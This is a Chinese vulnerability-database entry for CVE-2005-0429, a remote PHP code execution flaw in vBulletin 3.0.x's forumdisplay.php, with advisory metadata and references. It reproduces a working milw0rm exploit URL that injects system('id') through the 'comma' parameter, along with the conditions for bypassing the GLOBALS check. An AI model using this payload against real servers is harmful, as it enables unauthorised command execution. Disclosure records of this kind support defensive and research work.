vBulletin 3.0.x PHP远程任意代码执行漏洞

vBulletin 3.0.x PHP远程任意代码执行漏洞

漏洞ID 1108457 漏洞类型 输入验证
发布时间 2005-02-14 更新时间 2005-10-20
图片[1]-vBulletin 3.0.x PHP远程任意代码执行漏洞-安全小百科CVE编号 CVE-2005-0429
图片[2]-vBulletin 3.0.x PHP远程任意代码执行漏洞-安全小百科CNNVD-ID CNNVD-200505-246
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/818
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-246
|漏洞详情
vBulletinforumdisplay.php脚本存在安全问题,远程攻击者可以利用这个漏洞以进程权限执行任意命令。
|漏洞EXP
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
		    showforumusers ON in vbulletin options.

2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
		    visit the forums, it  must has at least one user show the forum.

4th condition     : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
		    init.php by secret array GLOBALS[]=1 ;)))

# milw0rm.com [2005-02-14]
|参考资料

来源:BUGTRAQ
名称:20050213vbulletin3.0.xPHPcodeexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110840807415315&w;=2
来源:BID
名称:12542
链接:http://www.securityfocus.com/bid/12542

相关推荐: MyServer 0.4.3 – GET Argument Buffer Overflow

MyServer 0.4.3 – GET Argument Buffer Overflow 漏洞ID 1054149 漏洞类型 发布时间 2003-09-08 更新时间 2003-09-08 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享